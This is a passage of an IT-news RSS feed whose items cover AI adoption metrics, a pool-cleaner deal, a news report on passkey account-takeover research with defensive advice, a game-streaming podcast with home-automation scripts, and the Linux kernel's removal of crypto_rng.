<p class="wp-block-paragraph">What does it cost, all in, to produce a unit of work you would actually ship: checked, corrected, done? All in means the subscription, the prompting time, the review time and the rework when errors slip through.</p>



<p class="wp-block-paragraph">This number does two jobs. It exposes the true economics, which usually look worse than the dashboard claims early on, because the human labor around the tool costs more than the tool itself. And it gives you the one number that should fall over time if capability is genuinely accumulating, because encoded standards and better context reduce exactly those human hours.</p>



<ul class="wp-block-list">
<li><strong>How to measure it:</strong> Instrument one workflow end-to-end, honestly, before generalizing. Most organizations have never done this once.</li>
</ul>



<h3 class="wp-block-heading">6. Use is getting deeper, not just wider</h3>



<p class="wp-block-paragraph">Adoption metrics count users. This signal counts the nature of use. Shallow use, such as rewriting emails and summarizing documents, spreads fast and produces little. Deep use, where AI is applied to judgment-heavy work with real context and real evaluation, spreads slowly and produces most of the return.</p>



<ul class="wp-block-list">
<li><strong>How to measure it: </strong>Classify actual usage into shallow and deep, even roughly, and track the ratio. Fifty deep users beat a thousand shallow ones, and only this signal can tell you which group you have.</li>
</ul>



<h2 class="wp-block-heading"><a></a>Two cautions</h2>



<p class="wp-block-paragraph">First, any of these signals can be gamed once it becomes a target. This is <a href="https://en.wikipedia.org/wiki/Goodhart%27s_law">Goodhart’s Law.</a> The review burden can fall because people simply review less. So, pair every efficiency signal with a quality check, such as error rates, rework and downstream complaints.</p>



<p class="wp-block-paragraph">Second, expect the early numbers to look bad. Honest instrumentation usually shows that AI currently costs more per verified outcome than the old process, because the organization is still <a href="https://www.nber.org/papers/w25148">paying its learning costs</a>.</p>



<h2 class="wp-block-heading"><a></a>Final thoughts</h2>



<p class="wp-block-paragraph"><br>I am not saying AI is overhyped, and I am not saying speed, cost and adoption will never matter. Every real gain eventually shows up in those numbers. I am saying they show up last because they are the output of a learning process, not the process itself. Judge AI by them today, and you will make your keep-or-kill decisions years before the evidence arrives.</p>



<p class="wp-block-paragraph">If I could track only one thing, it would be the delegation boundary. It compresses everything else into a single observable fact. The boundary only moves when context has been encoded, standards have been made explicit, corrections have been institutionalized and trust has been earned through verified results. It is the output yardstick of the entire learning system. If this has not moved in a year, no other number on the dashboard means anything, however green it looks.</p>



<p class="wp-block-paragraph">Measure the learning, and the returns will follow. Measure only the returns, and you may kill the learning that produces them.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your Pool Could Practically Clean Itself With This $1,149 Beatbot Deal]]></title>
<description><![CDATA[A $350 discount brings the Beatbot Sora 70 smart pool cleaner down to its best price yet.]]></description>
<link>https://tsecurity.de/de/3707602/it-nachrichten/your-pool-could-practically-clean-itself-with-this-1149-beatbot-deal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707602/it-nachrichten/your-pool-could-practically-clean-itself-with-this-1149-beatbot-deal/</guid>
<pubDate>Thu, 06 Aug 2026 12:50:09 +0200</pubDate>
<content:encoded><![CDATA[A $350 discount brings the Beatbot Sora 70 smart pool cleaner down to its best price yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Architecture: Moving Past the Washing to the Truth]]></title>
<description><![CDATA[In the current hype cycle, “AI” has become a linguistic junk drawer—a catch-all term that vendors use to mask everything from basic if-then statements to massive neural networks. For the modern enterprise, this “AI Washing” isn’t just annoying, it’s a strategic risk.  To build a resilient, sovere...]]></description>
<link>https://tsecurity.de/de/3707297/unix-server/ai-architecture-moving-past-the-washing-to-the-truth/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707297/unix-server/ai-architecture-moving-past-the-washing-to-the-truth/</guid>
<pubDate>Thu, 06 Aug 2026 06:34:37 +0200</pubDate>
<content:encoded><![CDATA[<p>In the current hype cycle, “AI” has become a linguistic junk drawer—a catch-all term that vendors use to mask everything from basic if-then statements to massive neural networks. For the modern enterprise, this “AI Washing” isn’t just annoying, it’s a strategic risk.  To build a resilient, sovereign infrastructure, we have to stop treating AI as […]</p>
<p>The post <a href="https://www.suse.com/c/ai-architecture-moving-past-the-washing-to-the-truth/">AI Architecture: Moving Past the Washing to the Truth</a> appeared first on <a href="https://www.suse.com/c">SUSE Communities</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Report: Passkey security issues could allow account takeover]]></title>
<description><![CDATA[Given the widespread enterprise adoption of passkeys to replace passwords, a Palo Alto Networks Unit 42 report disclosing ways attackers are getting around passkey protections is concerning, analysts say, but they stress that the demonstrated attacks can only happen after a successful intrusion.
...]]></description>
<link>https://tsecurity.de/de/3707173/ai-nachrichten/report-passkey-security-issues-could-allow-account-takeover/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707173/ai-nachrichten/report-passkey-security-issues-could-allow-account-takeover/</guid>
<pubDate>Thu, 06 Aug 2026 03:45:53 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Given the widespread enterprise adoption of passkeys to replace passwords, a Palo Alto Networks Unit 42 report disclosing ways attackers are getting around passkey protections is concerning, analysts say, but they stress that the demonstrated attacks can only happen after a successful intrusion.</p>



<p class="wp-block-paragraph">They also pointed out that the issues are not strictly caused by holes in passkeys so much as by weaknesses in the procedures surrounding them. </p>



<p class="wp-block-paragraph">“The researchers didn’t break the underlying cryptography. They exploited the seams around it: onboarding flows, recovery mechanisms and trust signals that weren’t being validated,” said <a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence. “That distinction matters because it tells us where the actual risk lives.”</p>



<p class="wp-block-paragraph">The <a href="https://unit42.paloaltonetworks.com/passwordless-authentication-security-risks/" target="_blank" rel="noreferrer noopener">Palo Alto report</a> showed attacks that, it said, “demonstrate how malware on a compromised endpoint can misuse onboarding, recovery and device trust workflows to take over passkey-protected accounts,” as well as “how an attacker can authenticate without user interaction, bypass user verification requirements and extract all synced passkey private keys.”</p>



<p class="wp-block-paragraph">Palo Alto described three categories of attack, collectively dubbed Pass-ta-key: Pass-ta-key, where an attacker takes over an account protected by a Google-synced passkey using malware running on the victim’s device, without requiring privilege escalation, device unlock or user interaction; Silver Pass-ta-key, which involves an attacker tricking Google Cloud Authenticator into believing the victim has unlocked the device with biometrics, leading to full account takeover without using the victim’s device during authentication; and Golden Pass-ta-key, which allows an attacker to extract all synced passkeys in a form that lets them be shared or sold on the credential black market.</p>



<p class="wp-block-paragraph">Given the complexity of most global enterprise threat surfaces, <a href="https://www.csoonline.com/article/4085426/your-passwordless-future-may-never-fully-arrive.html" target="_blank">some CISOs have struggled</a> with adapting passwordless processes to environments with legacy and virtual environments. Passcodes have <a href="https://www.csoonline.com/article/4197086/microsoft-is-forcing-an-enterprise-transition-to-passkeys-2.html" target="_blank">been recently embraced</a> by enterprise CISOs as the first step in implementing a passwordless strategy.</p>



<p class="wp-block-paragraph">Analysts and consultants in the main agreed that the flaw Palo Alto reports is significant, despite the fact that it assumes the attacker has already penetrated an environment and successfully installed malware. Sadly, given that such penetration only requires one privileged user anywhere to accidentally click on a poisoned link or attachment, the assumption of prior penetration is likely valid.</p>



<h2 class="wp-block-heading">Implementation issues are the problem</h2>



<p class="wp-block-paragraph">What the report reveals is less about any flaws within passcodes directly, and more about the lack of attention paid to a wide range of mechanisms surrounding them. </p>



<p class="wp-block-paragraph">Greis said CISOs now need to focus on what to do, and what to test, based on the assumption that user behavior is not always as expected. </p>



<p class="wp-block-paragraph">In several cases cited in the report, he pointed out, issues occurred “not because the standard is flawed, but because implementations haven’t caught up to it. It mirrors what we’ve seen repeatedly in security: the specification is sound, but the ecosystem implementing it is uneven.”</p>



<p class="wp-block-paragraph">Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, agreed. </p>



<p class="wp-block-paragraph">“On any service where your organization is the relying party, require user verification and actually validate the user-verified flag in the authentication response,” he said. “The researchers found real-world services accepting logins without it, which quietly collapses a multi-factor login back into a single factor.”</p>



<p class="wp-block-paragraph"><a href="https://my.idc.com/getdoc.jsp?containerId=PRF004767" target="_blank" rel="noreferrer noopener">Frank Dickson</a>, group VP for security at IDC, added that he would stress to CISOs that this attack assumes a prior successful penetration. </p>



<p class="wp-block-paragraph">“This isn’t passkeys getting hacked from across the internet. It’s what [an attacker] does once they’re already inside the house. So the real headline is that ‘phishing resistant’ stops being resistant the moment the endpoint stops being clean,” he said.</p>



<p class="wp-block-paragraph">“Stop treating verification as optional,” he advised. “Flip it to required, check it server side every single time, and save your hardware bound keys, the YubiKeys of the world, for the accounts that matter most. A key that never leaves a physical device is a key no attacker can ever harvest in bulk.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/orfink/" target="_blank" rel="noreferrer noopener">Or Finkelstein</a>, head of marketing at Secret Double Octopus, agreed that CISOs have gotten complacent about the way in which systems support passkeys.</p>



<p class="wp-block-paragraph">“CISOs should probably look at how user verification is enforced, how enrollment and recovery work, have a clear and enforced policy on whether credentials are synced or device-bound, and have some ITDR system to quickly mitigate suspicious endpoints and authenticators,” he said. “In most serious enterprise environments, EDR and device management reduce the likelihood of initial attacks, but do not close every post-compromise attack path.”</p>



<h2 class="wp-block-heading">Poor support processes weaken passkeys</h2>



<p class="wp-block-paragraph">Some have argued that the lack of sufficiently robust support processes actually weakens passkey capabilities and undermines the whole point of such systems.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/jwgoerlich/" target="_blank" rel="noreferrer noopener">J. Wolfgang Goerlich</a>, a member of the faculty of IANS and a longtime cybersecurity consultant, pointed out that the original FIDO2 spec eliminated credential theft by binding the private key to a physical authenticator. Synced passkeys reintroduced credential portability and therefore reintroduced the form of credential theft risk cited in the Palo Alto report.</p>



<p class="wp-block-paragraph">“A passwordless system is exactly as strong as the flow that re-establishes it,” he said. “Both serious techniques here start by forcing a device to re-enroll. Many security teams have never modeled, never monitored and never rehearsed a response to this.”</p>



<p class="wp-block-paragraph">Goerlich’s advice to CISOs is to require device-bound authenticators, such as hardware tokens or computers, for all privileged and sensitive access. They may consider allowing wallets for lower risk access, he said, “however, much like passwords in Web browsers have long been at risk, we must now consider passkeys in the browsers an unacceptable risk.”</p>



<p class="wp-block-paragraph">This article originally appeared on <a href="https://www.csoonline.com/article/4205751/report-passkey-security-issues-could-allow-account-takeover.html" target="_blank">CSOonline</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4699: Sunshine, Moonlight, Playnite !?]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.


sunshine / xbox contlers / plex / steam / UWPHook / Bluetoothctl restart / HDMI dongle




https://www.youtube.com/watch?v=FM4FbA4-W_c








UGREEN USB C Hub 5 in 1 Multiport Adapter Revodok 105 4K HDMI, 100W Power Delivery, 3 USB-A Data ...]]></description>
<link>https://tsecurity.de/de/3707168/podcasts/hpr4699-sunshine-moonlight-playnite/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707168/podcasts/hpr4699-sunshine-moonlight-playnite/</guid>
<pubDate>Thu, 06 Aug 2026 03:45:39 +0200</pubDate>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>
sunshine / xbox contlers / plex / steam / UWPHook / Bluetoothctl restart / HDMI dongle</p>

<p>

<a href="https://www.youtube.com/watch?v=FM4FbA4-W_c" rel="noopener noreferrer" target="_blank">
https://www.youtube.com/watch?v=FM4FbA4-W_c</a>

</p>

<p>

</p>

<p>
UGREEN USB C Hub 5 in 1 Multiport Adapter Revodok 105 4K HDMI, 100W Power Delivery, 3 USB-A Data Ports, USB C Dongle for MacBook Pro/Air, iPad Pro, iMac, iPhone 16 Pro/Pro Max, XPS, Thinkpad</p>

<p>

<a href="https://www.amazon.com/dp/B0BR3M8XHK" rel="noopener noreferrer" target="_blank">
https://www.amazon.com/dp/B0BR3M8XHK</a>

</p>

<p>
Detached Command:</p>

<pre data-language="plain">
@ECHO OFF
cd "C:\backup\gamestream_launchpad"
c:\windows\System32\HdrSwitcher.exe disable
start /MIN gamestream_launchpad.exe 1920 1080 gamestream_playnite.ini
</pre>

<p>

</p>

<pre data-language="plain">
.bindkeys rc 
cat .xbindkeysrc
/bin/bash /home/plex/.local/bin/Plex.sh
/bin/bash /home/plex/.local/bin/Steam.sh
/home/plex/.local/bin/kasa --host 192.168.1.239 --port 9999 --type dimmer on; /home/plex/.local/bin/kasa --host 192.168.1.239 --port 9999 --type dimmer brightness 100;xgamma -gamma 1.3
/home/plex/.local/bin/kasa --host 192.168.1.239 --port 9999 --type dimmer on; /home/plex/.local/bin/kasa --host 192.168.1.239 --port 9999 --type dimmer brightness 40;xgamma -gamma 1.3
/home/plex/.local/bin/kasa --host 192.168.1.239 --port 9999 --type dimmer on; /home/plex/.local/bin/kasa --host 192.168.1.239 --port 9999 --type dimmer brightness 12;xgamma -gamma 1.3
/home/plex/.local/bin/kasa --host 192.168.1.239 --port 9999 --type dimmer off;xgamma -gamma 1.3"
</pre>

<p>

</p>

<pre data-language="plain">
cat /home/plex/.local/bin/Steam.sh
# requires wmctrl -l and xbindkeys
#
# xdotool windowactivate ```xdotool search --name 'window  name'```
# 0
StartSteamLink(){
 echo "restarting bluetooth"
 sudo systemctl restart bluetooth
 echo "Waking Game PC"
 sudo /usr/sbin/etherwake -i enp1s0 -D "d8:bb:c1:a2:2c:0b"
 echo "Starting steamlink"
 killall -9 steamlink
 killall moonlight
 sleep 20
# /snap/bin/moonlight
 /home/plex/.local/bin/Moonlight-6.1.0-x86_64.AppImage    
}
StartSteamLink


</pre>

<p>
SUMMARY:</p>

<ol>

<li>
 Speaker discusses technical challenges with Sun Shine, Moonlight, and Play Night setups.</li>

</ol>

<p>
IDEAS:</p>

<ol>

<li>
 Sun Shine and Moonlight enable remote game streaming.</li>

<li>
 Play Night acts as a multimodal launcher for Steam.</li>

<li>
 Resolution changes cause display issues during gameplay.</li>

<li>
 Proper exit sequence is critical to revert settings.</li>

<li>
 Ultra-wide resolutions are unusable in some configurations.</li>

<li>
 Multiple launchers require separate logins for different games.</li>

<li>
 Environment variables can adjust client dimensions.</li>

<li>
 Background commands improve system stability.</li>

<li>
 Cat named Mojo is mentioned during the discussion.</li>

<li>
 5G networks support slower-paced gaming.</li>

<li>
 Technical glitches include frame drops and latency.</li>

<li>
 Steam accounts are tied to specific game libraries.</li>

<li>
 Detached commands run in the background without user interaction.</li>

<li>
 GameStream Launchpad manages resolution and launcher paths.</li>

<li>
 Magical system behavior simplifies remote gaming.</li>

<li>
 Star Wars and Baldurâ€™s Gate are cited as example games.</li>

<li>
 22nd Millie thing refers to network latency.</li>

<li>
 Multiple Steam accounts complicate game access.</li>

<li>
 Task killing reverts system settings automatically.</li>

<li>
 Cross-platform streaming solutions are highlighted.</li>

</ol>

<p>

</p>

<p>
RECOMMENDATIONS:</p>

<ol>

<li>
 Use environment variables for client resolution adjustments.</li>

<li>
 Exit applications properly to revert settings.</li>

<li>
 Set up detached background commands for stability.</li>

<li>
 Monitor ultra-wide resolution compatibility.</li>

<li>
 Utilize Play Night for Steam account management.</li>

<li>
 Avoid multiple logins for different game libraries.</li>

<li>
 Opt for cross-platform streaming solutions.</li>

<li>
 Check network latency for smooth gameplay.</li>

<li>
 Use bat files for automated task execution.</li>

<li>
 Configure GameStream Launchpad for resolution changes.</li>

<li>
 Prioritize proper task termination to prevent glitches.</li>

<li>
 Test 5G networks for slower-paced gaming.</li>

<li>
 Leverage environment variables for client settings.</li>

<li>
 Ensure all applications exit before shutting down.</li>

<li>
 Use detached commands for background processes.</li>

<li>
 Verify resolution compatibility with ultra-wide displays.</li>

<li>
 Combine Sun Shine and Moonlight for reliable streaming.</li>

<li>
 Log in once for multiple Steam accounts.</li>

<li>
 Address frame drops in low-latency networks.</li>

<li>
 Stream games universally across platforms.</li>

</ol>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4699/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux Kernel Begins Phasing Out the crypto_rng Layer to Simplify Random Number Generation]]></title>
<description><![CDATA[by George Whittaker
      
            Linux kernel developers are moving forward with plans to remove the crypto_rng API layer, a long-standing component of the kernel's cryptographic subsystem. The proposed change is part of a broader effort to simplify the kernel's internal architecture by eli...]]></description>
<link>https://tsecurity.de/de/3707148/unix-server/linux-kernel-begins-phasing-out-the-cryptorng-layer-to-simplify-random-number-generation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707148/unix-server/linux-kernel-begins-phasing-out-the-cryptorng-layer-to-simplify-random-number-generation/</guid>
<pubDate>Thu, 06 Aug 2026 03:32:31 +0200</pubDate>
<content:encoded><![CDATA[<div data-history-node-id="1341450" class="layout layout--onecol">
    <div class="layout__region layout__region--content">
      
            <div class="field field--name-field-node-image field--type-image field--label-hidden field--item">  <img loading="lazy" src="https://www.linuxjournal.com/sites/default/files/nodeimage/story/linux-kernel-begins-phasing-out-the-crypto-rng-layer-to-simplify-random-number-generation.jpg" width="850" height="500" alt="Linux Kernel Begins Phasing Out the crypto_rng Layer to Simplify Random Number Generation" typeof="foaf:Image" class="img-responsive">

</div>
      
            <div class="field field--name-node-author field--type-ds field--label-hidden field--item">by <a title="View user profile." href="https://www.linuxjournal.com/users/george-whittaker" lang="" about="/users/george-whittaker" typeof="schema:Person" property="schema:name" datatype="">George Whittaker</a></div>
      
            <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p>Linux kernel developers are moving forward with plans to <strong>remove the <code>crypto_rng</code> API layer</strong>, a long-standing component of the kernel's cryptographic subsystem. The proposed change is part of a broader effort to simplify the kernel's internal architecture by eliminating redundant code paths and encouraging developers to rely on the kernel's modern random number generation interfaces instead. (<a>phoronix.com</a>)</p>

<p>Although the change happens entirely behind the scenes, it reflects the Linux kernel community's ongoing commitment to reducing technical debt, improving maintainability, and modernizing core infrastructure.</p>

<h2><strong>What Is the <code>crypto_rng</code> Layer?</strong></h2>

<p>The <code>crypto_rng</code> framework is an API within the Linux kernel's Crypto API that provides random number generation services for kernel components.</p>

<p>Historically, it allowed different kernel subsystems and drivers to request random data through a generic cryptographic interface. Over time, however, the kernel's dedicated random number generator has matured considerably, making much of the <code>crypto_rng</code> abstraction unnecessary. (<a href="https://www.kernel.org/doc/html/latest/crypto/index.html?utm_source=chatgpt.com">kernel.org</a>)</p>

<p>Today, developers generally recommend using the kernel's built-in random number generation functions directly instead of routing requests through the older crypto layer.</p>

<h2><strong>Why Developers Want to Remove It</strong></h2>

<p>According to discussions on the Linux kernel mailing list, the <code>crypto_rng</code> layer has become largely redundant.</p>

<p>Modern kernel code already relies on well-established interfaces such as:</p>

<ul><li><code>get_random_bytes()</code></li>
	<li><code>get_random_u32()</code></li>
	<li><code>get_random_u64()</code></li>
</ul><p>These functions are maintained as part of the kernel's primary random number generation subsystem and are widely used throughout Linux. Maintaining an additional abstraction layer increases code complexity without providing significant practical benefits. (<a>phoronix.com</a>)</p>

<p>Removing unnecessary infrastructure also makes the kernel easier to maintain and audit over the long term.</p>

<h2><strong>Simplifying the Crypto API</strong></h2>

<p>The Linux Crypto API has evolved significantly over the years as new algorithms, hardware accelerators, and security features have been introduced.</p>

<p>Kernel maintainers have increasingly focused on:</p></div>
      
            <div class="field field--name-node-link field--type-ds field--label-hidden field--item">  <a href="https://www.linuxjournal.com/content/linux-kernel-begins-phasing-out-cryptorng-layer-simplify-random-number-generation" hreflang="en">Go to Full Article</a>
</div>
      
    </div>
  </div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Report: Passkey security issues could allow account takeover]]></title>
<description><![CDATA[Given the widespread enterprise adoption of passkeys to replace passwords, a Palo Alto Networks Unit 42 report disclosing ways attackers are getting around passkey protections is concerning, analysts say, but they stress that the demonstrated attacks can only happen after a successful intrusion.
...]]></description>
<link>https://tsecurity.de/de/3707087/it-security-nachrichten/report-passkey-security-issues-could-allow-account-takeover/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707087/it-security-nachrichten/report-passkey-security-issues-could-allow-account-takeover/</guid>
<pubDate>Thu, 06 Aug 2026 03:28:09 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Given the widespread enterprise adoption of passkeys to replace passwords, a Palo Alto Networks Unit 42 report disclosing ways attackers are getting around passkey protections is concerning, analysts say, but they stress that the demonstrated attacks can only happen after a successful intrusion.</p>



<p class="wp-block-paragraph">They also pointed out that the issues are not strictly caused by holes in passkeys so much as by weaknesses in the procedures surrounding them. </p>



<p class="wp-block-paragraph">“The researchers didn’t break the underlying cryptography. They exploited the seams around it: onboarding flows, recovery mechanisms and trust signals that weren’t being validated,” said <a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence. “That distinction matters because it tells us where the actual risk lives.”</p>



<p class="wp-block-paragraph">The <a href="https://unit42.paloaltonetworks.com/passwordless-authentication-security-risks/" target="_blank" rel="noreferrer noopener">Palo Alto report</a> showed attacks that, it said, “demonstrate how malware on a compromised endpoint can misuse onboarding, recovery and device trust workflows to take over passkey-protected accounts,” as well as “how an attacker can authenticate without user interaction, bypass user verification requirements and extract all synced passkey private keys.”</p>



<p class="wp-block-paragraph">Palo Alto described three categories of attack, collectively dubbed Pass-ta-key: Pass-ta-key, where an attacker takes over an account protected by a Google-synced passkey using malware running on the victim’s device, without requiring privilege escalation, device unlock or user interaction; Silver Pass-ta-key, which involves an attacker tricking Google Cloud Authenticator into believing the victim has unlocked the device with biometrics, leading to full account takeover without using the victim’s device during authentication; and Golden Pass-ta-key, which allows an attacker to extract all synced passkeys in a form that lets them be shared or sold on the credential black market.</p>



<p class="wp-block-paragraph">Given the complexity of most global enterprise threat surfaces, <a href="https://www.csoonline.com/article/4085426/your-passwordless-future-may-never-fully-arrive.html" target="_blank">some CISOs have struggled</a> with adapting passwordless processes to environments with legacy and virtual environments. Passcodes have <a href="https://www.csoonline.com/article/4197086/microsoft-is-forcing-an-enterprise-transition-to-passkeys-2.html" target="_blank">been recently embraced</a> by enterprise CISOs as the first step in implementing a passwordless strategy.</p>



<p class="wp-block-paragraph">Analysts and consultants in the main agreed that the flaw Palo Alto reports is significant, despite the fact that it assumes the attacker has already penetrated an environment and successfully installed malware. Sadly, given that such penetration only requires one privileged user anywhere to accidentally click on a poisoned link or attachment, the assumption of prior penetration is likely valid.</p>



<h2 class="wp-block-heading">Implementation issues are the problem</h2>



<p class="wp-block-paragraph">What the report reveals is less about any flaws within passcodes directly, and more about the lack of attention paid to a wide range of mechanisms surrounding them. </p>



<p class="wp-block-paragraph">Greis said CISOs now need to focus on what to do, and what to test, based on the assumption that user behavior is not always as expected. </p>



<p class="wp-block-paragraph">In several cases cited in the report, he pointed out, issues occurred “not because the standard is flawed, but because implementations haven’t caught up to it. It mirrors what we’ve seen repeatedly in security: the specification is sound, but the ecosystem implementing it is uneven.”</p>



<p class="wp-block-paragraph">Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, agreed. </p>



<p class="wp-block-paragraph">“On any service where your organization is the relying party, require user verification and actually validate the user-verified flag in the authentication response,” he said. “The researchers found real-world services accepting logins without it, which quietly collapses a multi-factor login back into a single factor.”</p>



<p class="wp-block-paragraph"><a href="https://my.idc.com/getdoc.jsp?containerId=PRF004767" target="_blank" rel="noreferrer noopener">Frank Dickson</a>, group VP for security at IDC, added that he would stress to CISOs that this attack assumes a prior successful penetration. </p>



<p class="wp-block-paragraph">“This isn’t passkeys getting hacked from across the internet. It’s what [an attacker] does once they’re already inside the house. So the real headline is that ‘phishing resistant’ stops being resistant the moment the endpoint stops being clean,” he said.</p>



<p class="wp-block-paragraph">“Stop treating verification as optional,” he advised. “Flip it to required, check it server side every single time, and save your hardware bound keys, the YubiKeys of the world, for the accounts that matter most. A key that never leaves a physical device is a key no attacker can ever harvest in bulk.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/orfink/" target="_blank" rel="noreferrer noopener">Or Finkelstein</a>, head of marketing at Secret Double Octopus, agreed that CISOs have gotten complacent about the way in which systems support passkeys.</p>



<p class="wp-block-paragraph">“CISOs should probably look at how user verification is enforced, how enrollment and recovery work, have a clear and enforced policy on whether credentials are synced or device-bound, and have some ITDR system to quickly mitigate suspicious endpoints and authenticators,” he said. “In most serious enterprise environments, EDR and device management reduce the likelihood of initial attacks, but do not close every post-compromise attack path.”</p>



<h2 class="wp-block-heading">Poor support processes weaken passkeys</h2>



<p class="wp-block-paragraph">Some have argued that the lack of sufficiently robust support processes actually weakens passkey capabilities and undermines the whole point of such systems.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/jwgoerlich/" target="_blank" rel="noreferrer noopener">J. Wolfgang Goerlich</a>, a member of the faculty of IANS and a longtime cybersecurity consultant, pointed out that the original FIDO2 spec eliminated credential theft by binding the private key to a physical authenticator. Synced passkeys reintroduced credential portability and therefore reintroduced the form of credential theft risk cited in the Palo Alto report.</p>



<p class="wp-block-paragraph">“A passwordless system is exactly as strong as the flow that re-establishes it,” he said. “Both serious techniques here start by forcing a device to re-enroll. Many security teams have never modeled, never monitored and never rehearsed a response to this.”</p>



<p class="wp-block-paragraph">Goerlich’s advice to CISOs is to require device-bound authenticators, such as hardware tokens or computers, for all privileged and sensitive access. They may consider allowing wallets for lower risk access, he said, “however, much like passwords in Web browsers have long been at risk, we must now consider passkeys in the browsers an unacceptable risk.”</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Report: Passkey security issues could allow account takeover]]></title>
<description><![CDATA[Given the widespread enterprise adoption of passkeys to replace passwords, a Palo Alto Networks Unit 42 report disclosing ways attackers are getting around passkey protections is concerning, analysts say, but they stress that the demonstrated attacks can only happen after a successful intrusion.
...]]></description>
<link>https://tsecurity.de/de/3707070/it-nachrichten/report-passkey-security-issues-could-allow-account-takeover/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707070/it-nachrichten/report-passkey-security-issues-could-allow-account-takeover/</guid>
<pubDate>Thu, 06 Aug 2026 03:17:10 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Given the widespread enterprise adoption of passkeys to replace passwords, a Palo Alto Networks Unit 42 report disclosing ways attackers are getting around passkey protections is concerning, analysts say, but they stress that the demonstrated attacks can only happen after a successful intrusion.</p>



<p class="wp-block-paragraph">They also pointed out that the issues are not strictly caused by holes in passkeys so much as by weaknesses in the procedures surrounding them. </p>



<p class="wp-block-paragraph">“The researchers didn’t break the underlying cryptography. They exploited the seams around it: onboarding flows, recovery mechanisms and trust signals that weren’t being validated,” said <a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence. “That distinction matters because it tells us where the actual risk lives.”</p>



<p class="wp-block-paragraph">The <a href="https://unit42.paloaltonetworks.com/passwordless-authentication-security-risks/" target="_blank" rel="noreferrer noopener">Palo Alto report</a> showed attacks that, it said, “demonstrate how malware on a compromised endpoint can misuse onboarding, recovery and device trust workflows to take over passkey-protected accounts,” as well as “how an attacker can authenticate without user interaction, bypass user verification requirements and extract all synced passkey private keys.”</p>



<p class="wp-block-paragraph">Palo Alto described three categories of attack, collectively dubbed Pass-ta-key: Pass-ta-key, where an attacker takes over an account protected by a Google-synced passkey using malware running on the victim’s device, without requiring privilege escalation, device unlock or user interaction; Silver Pass-ta-key, which involves an attacker tricking Google Cloud Authenticator into believing the victim has unlocked the device with biometrics, leading to full account takeover without using the victim’s device during authentication; and Golden Pass-ta-key, which allows an attacker to extract all synced passkeys in a form that lets them be shared or sold on the credential black market.</p>



<p class="wp-block-paragraph">Given the complexity of most global enterprise threat surfaces, <a href="https://www.csoonline.com/article/4085426/your-passwordless-future-may-never-fully-arrive.html" target="_blank">some CISOs have struggled</a> with adapting passwordless processes to environments with legacy and virtual environments. Passcodes have <a href="https://www.csoonline.com/article/4197086/microsoft-is-forcing-an-enterprise-transition-to-passkeys-2.html" target="_blank">been recently embraced</a> by enterprise CISOs as the first step in implementing a passwordless strategy.</p>



<p class="wp-block-paragraph">Analysts and consultants in the main agreed that the flaw Palo Alto reports is significant, despite the fact that it assumes the attacker has already penetrated an environment and successfully installed malware. Sadly, given that such penetration only requires one privileged user anywhere to accidentally click on a poisoned link or attachment, the assumption of prior penetration is likely valid.</p>



<h2 class="wp-block-heading">Implementation issues are the problem</h2>



<p class="wp-block-paragraph">What the report reveals is less about any flaws within passcodes directly, and more about the lack of attention paid to a wide range of mechanisms surrounding them. </p>



<p class="wp-block-paragraph">Greis said CISOs now need to focus on what to do, and what to test, based on the assumption that user behavior is not always as expected. </p>



<p class="wp-block-paragraph">In several cases cited in the report, he pointed out, issues occurred “not because the standard is flawed, but because implementations haven’t caught up to it. It mirrors what we’ve seen repeatedly in security: the specification is sound, but the ecosystem implementing it is uneven.”</p>



<p class="wp-block-paragraph">Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, agreed. </p>



